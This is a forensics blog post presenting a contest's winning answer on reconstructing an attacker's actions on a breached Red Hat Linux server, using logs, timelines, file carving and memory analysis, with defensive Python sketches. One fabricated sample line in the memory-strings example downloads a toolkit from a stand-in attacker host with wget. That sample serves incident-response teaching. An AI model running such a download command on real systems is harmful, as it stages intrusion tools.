Monday, January 27, 2014

Daily Blog #218: Sunday Funday 1/26/14 Winner!

Hello Reader,
   One of the great things about Sunday Fundays is that we get to find those individuals out there whose experience shines through in their answers. This week's challenge had a few great answers, but this week's winning answer was not only received before the other contenders but shone through as a winner. Take the time to read this one; you'll find some great ideas for your future Linux server investigations.

The Challenge:
You have a Redhat Enterprise Linux v5 server running an eCommerce site. The server was breached when the attacker logged in as the root user two weeks ago and linked the shell history file to /dev/null. What other artifacts can you rely on to determine what the attacker did over the past two weeks?

The Winning Answer:

TL;DR: /var/log/secure, SSH log, syslog, wtmp & btmp, Apache logs, firewall logs, acct files, memory image, file system metadata & journal & deleted content.

RHEL 5 was first released in 2007 and uses kernel 2.6.18, even in the latest update (Update 10, October 2013).

My strategy for approaching this investigation would consist of two phases: first, identify the periods of potential attacker activity; second, drill into those suspicious time ranges to collect attacker commands and actions. Generally speaking, I would use multiple log sources to draft an initial list of suspicious time ranges. Then, I would use more specific tools to recover evidence of commands and actions within those ranges.

Due to the specific wording used in the scenario, I don’t have to worry about reviewing the system for evidence of a remote exploit such as SQL injection. Of course, the best place to start running that down is by reviewing application and server logs.

To begin, I would review the file /var/log/secure to identify how the attacker logged in for the first time. This is a log file that records entries associated with authentication requests, including timestamps, usernames, source processes, and error messages. According to the scenario, the system was compromised for the first time via the root login. So, I’d need to cross reference all legitimate administrator activity with root logins since approximately two weeks ago. The outstanding entries should be associated with the attacker (or poorly configured services).
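As a rough illustration, here's a minimal Python sketch of that cross-referencing step. The hostnames, IP addresses, and log lines below are made up, though the field layout follows the syslog-style sshd entries found in /var/log/secure:

```python
import re

# Hypothetical /var/log/secure excerpt (fabricated data); layout mirrors
# RHEL's syslog-style sshd entries: month day time host process[pid]: message.
SAMPLE = """\
Jan 12 03:14:22 web01 sshd[2412]: Accepted password for root from 203.0.113.7 port 52113 ssh2
Jan 12 09:01:05 web01 sshd[2519]: Accepted publickey for admin from 192.168.1.20 port 40022 ssh2
Jan 13 22:47:10 web01 sshd[2733]: Accepted password for root from 203.0.113.7 port 51877 ssh2
"""

LOGIN_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]+)\s+\S+\s+sshd\[\d+\]: "
    r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\S+)"
)

def root_logins(log_text):
    """Return (timestamp, auth method, source IP) for each root login."""
    hits = []
    for line in log_text.splitlines():
        m = LOGIN_RE.match(line)
        if m and m.group("user") == "root":
            hits.append((m.group("ts"), m.group("method"), m.group("ip")))
    return hits

for ts, method, ip in root_logins(SAMPLE):
    print(ts, method, ip)
```

In practice I'd dump every root login this way, then strike out the ones the administrators can vouch for.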

If I saw a single authentication attempt leading to a successful login, I would suspect that the attacker acquired legitimate credentials (account password or SSH certificate) elsewhere, perhaps by compromising another system, phishing the administrators, etc. I’d have to track this down by expanding the scope of the investigation. It is also possible that the password fell to a brute force attack, in which case I’d expect to see many, many unsuccessful attempts before a single successful authentication. The answer to this question may give me some insight into the type of attack I was dealing with, and how I might expect to see the remainder of the system configured. For instance, a properly secured environment should not fall to a brute force attack targeting the entire internet.
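That "many failures, then one success" pattern lends itself to a simple heuristic. A Python sketch, with the threshold and the event data as assumptions rather than values from any real incident:

```python
from collections import defaultdict

def flag_brute_force(events, threshold=10):
    """events: ordered (source_ip, success_bool) auth attempts.
    Flag any IP that succeeds after `threshold` or more straight failures."""
    failures = defaultdict(int)   # consecutive failures per source IP
    flagged = set()
    for ip, ok in events:
        if ok:
            if failures[ip] >= threshold:
                flagged.add(ip)
            failures[ip] = 0      # success resets the streak
        else:
            failures[ip] += 1
    return flagged

# Fabricated data: 12 failures then a success from one IP,
# plus a clean single login from an administrator's workstation.
events = [("198.51.100.9", False)] * 12 + [
    ("198.51.100.9", True),
    ("192.168.1.20", True),
]
print(flag_brute_force(events))  # {'198.51.100.9'}
```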

I’d review and cross reference wtmp and btmp files for additional session information. wtmp tracks a history of logins and logouts by user, and btmp tracks failed authentication attempts. utmp could be helpful, but it typically tracks the current state of the system. All these files can be found in the /var/log directory. These are binary files, but the format is well known, and similar versions of Linux (such as the Fedora release using kernel 2.6.18) can be used as effective analysis machines.
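For reference, a hedged Python sketch of parsing those binary records with the struct module. The 384-byte layout below matches glibc's struct utmp on a typical Linux build with 32-bit time fields, but it should be verified against bits/utmp.h on the actual analysis machine:

```python
import struct
from datetime import datetime, timezone

# Assumed glibc struct utmp layout (384 bytes/record, 32-bit time fields):
# ut_type, pad, ut_pid, ut_line[32], ut_id[4], ut_user[32], ut_host[256],
# exit_status (2 shorts), ut_session, tv_sec, tv_usec, ut_addr_v6[4], unused.
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)  # 384

def parse_wtmp(data):
    """Walk a wtmp/btmp byte buffer and yield decoded records."""
    recs = []
    for off in range(0, len(data) - UTMP_SIZE + 1, UTMP_SIZE):
        (ut_type, _pid, line, _id, user, host,
         _term, _exit, _sess, tv_sec, _usec, *_addr) = \
            struct.unpack_from(UTMP_FMT, data, off)
        recs.append({
            "type": ut_type,  # 7 == USER_PROCESS, i.e. a login
            "user": user.rstrip(b"\x00").decode("ascii", "replace"),
            "line": line.rstrip(b"\x00").decode("ascii", "replace"),
            "host": host.rstrip(b"\x00").decode("ascii", "replace"),
            "time": datetime.fromtimestamp(tv_sec, timezone.utc),
        })
    return recs

# Demo with one synthetic record (fabricated values).
rec = struct.pack(UTMP_FMT, 7, 1234, b"pts/0", b"ts/0", b"root",
                  b"203.0.113.7", 0, 0, 0, 1390000000, 0, 0, 0, 0, 0)
for r in parse_wtmp(rec):
    print(r["user"], r["host"], r["time"])
```

That said, the simplest route on a compatible analysis machine is `last -f wtmp` and `lastb -f btmp`; the sketch is only for when the record layout itself needs scrutiny.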

Once I had identified the first relevant login session, I would confirm the means of access: was it SSH, VNC, or some other remote access protocol? In each of these cases, I’d review the network architecture to determine from which network segments this protocol was allowed. Ideally, these administrative interfaces would not be exposed to the greater internet, but we’ve all seen that too often. If the administrative ports were not accessible to the internet, then it again means that the scope of the investigation should be expanded to include additional systems on the local network segment.

From the scenario description, the server is running an eCommerce site. An eCommerce site is typically composed of front end web services (serving static media like HTML, images, CSS, and Javascript, as well as dynamic pages generated by languages like PHP, Perl, or Python) and databases (MySQL or Postgres are popular). It is probably running at least some of the frontend services, and is therefore probably accessible to the internet.

This internet connection might be direct through a firewall, or through a load balancer/reverse proxy and firewall. I would review logs from the firewalls and load balancers to identify requests and related activity from the same source IP address. This would help define additional periods of activity associated with the attacker.
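One simple way to turn those correlated entries into time ranges, sketched in Python (the timestamps and IPs are invented for illustration; ISO 8601 strings compare correctly as text):

```python
def activity_windows(events):
    """events: (timestamp, source_ip) pairs pulled from any log source.
    Returns {ip: (first_seen, last_seen)} to bound suspicious ranges."""
    windows = {}
    for ts, ip in events:
        lo, hi = windows.get(ip, (ts, ts))
        windows[ip] = (min(lo, ts), max(hi, ts))
    return windows

# Fabricated events distilled from firewall, proxy, and web server logs.
events = [
    ("2014-01-12T03:14:22", "203.0.113.7"),
    ("2014-01-13T22:47:10", "203.0.113.7"),
    ("2014-01-12T09:01:05", "192.168.1.20"),
]
print(activity_windows(events)["203.0.113.7"])
```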

I would timeline all application logs (usually, /var/log/*/*), syslog entries (/var/log/messages, etc.), and file system activity. Log2timeline or Plaso are good tools for organizing all this information. Some types of interesting application log entries could be yum package manager entries (/var/log/yum.log) indicating that the attacker installed additional software, or Apache web server entries (usually, /var/log/httpd/*) showing that the attacker tested access to web directories via a web browser.
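As a toy stand-in for what log2timeline automates, here is a Python sketch that merges per-source, time-sorted events into one super-timeline (all entries below are fabricated):

```python
import heapq

# Each source is already sorted by time; ISO 8601 timestamp strings sort
# lexically in chronological order, so heapq.merge interleaves them correctly.
secure = [("2014-01-12T03:14:22", "secure",     "Accepted password for root")]
httpd  = [("2014-01-12T03:18:02", "access_log", "GET /uploads/sh.php")]
yum    = [("2014-01-12T03:20:41", "yum.log",    "Installed: nmap")]

timeline = list(heapq.merge(secure, httpd, yum))
for ts, source, msg in timeline:
    print(ts, source, msg)
```

The value of the merged view is exactly this kind of adjacency: a root login followed minutes later by a web shell request and a package install tells a story no single log does.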

I would pay particular attention to the file system activity, reviewing file system metadata for newly created, modified, or deleted files. The Sleuthkit and loopback devices are my favorite tools for working with Linux images. I’d hope to find attacker tools and/or attacker archived data using the file system metadata. To recover further deleted files, I might try Foremost and extundelete. Foremost carves chunks from a binary stream using known file signatures. extundelete processes the journal on ext3/ext4 and attempts to recover old copies of inodes, and subsequently the file data.
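To illustrate the signature-carving idea behind Foremost, a minimal Python sketch using JPEG start/end markers (a real carver also validates internal structure and handles fragmentation, which this does not):

```python
# Foremost-style carving sketch: scan a raw byte stream for JPEG
# start-of-image / end-of-image signatures and slice out candidates.
JPEG_SOI, JPEG_EOI = b"\xff\xd8\xff", b"\xff\xd9"

def carve_jpegs(data, max_len=10 * 1024 * 1024):
    out, pos = [], 0
    while True:
        start = data.find(JPEG_SOI, pos)
        if start == -1:
            break
        end = data.find(JPEG_EOI, start)
        if end == -1 or end - start > max_len:
            pos = start + 1       # unmatched or implausibly large; skip ahead
            continue
        out.append(data[start:end + 2])
        pos = end + 2
    return out

# Fabricated "disk image": a JPEG-shaped blob surrounded by slack.
blob = b"junk" + JPEG_SOI + b"\x00pixels" + JPEG_EOI + b"slack"
print(len(carve_jpegs(blob)))  # 1
```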

Of course, I would also acquire a memory image of the server, and subsequently use Volatility to extract artifacts. I would first attempt to use the “linux_bash” plugin, which extracts Bash shell history entries from memory. These entries may still be in memory despite the /dev/null link. However, due to the duration of the compromise (two weeks), I would not consider this source authoritative for all activity. A number of the other plugins (for instance, linux_check_*) are also appropriate for identifying the presence of rootkits and other suspicious processes.
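Even without Volatility, a strings(1)-style pass over the raw image can surface command fragments. A Python sketch over a fabricated memory buffer; the "#&lt;epoch&gt;" marker shown is the timestamp format bash uses for history entries when HISTTIMEFORMAT is set, and is one of the strings worth hunting for:

```python
import re

def strings(data, min_len=6):
    """Extract printable-ASCII runs of at least min_len bytes,
    like the strings(1) utility."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]

# Fabricated memory fragment: a history timestamp marker followed by a
# command line, embedded in non-printable noise.
mem = b"\x00\x00#1390262062\x00wget http://evil.example/kit.tgz\x00\x01\xffnoise"
for s in strings(mem):
    print(s)
```

This is noisy and unordered compared to the plugin's output, which is why I'd treat it as a fallback rather than a first choice.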

Finally, I would review the process accounting information tracked by the “acct” service. This service typically stores its data in the file /var/account/pacct, which records processes run and resources consumed. I would start by reviewing the data using the “lastcomm” and “sar” programs to identify process names I don’t recognize. I could also correlate processes run before two weeks ago with those run after. Though the process accounting logs do not always contain verbose information, they could be effective in identifying Bitcoin miners or other rogue processes.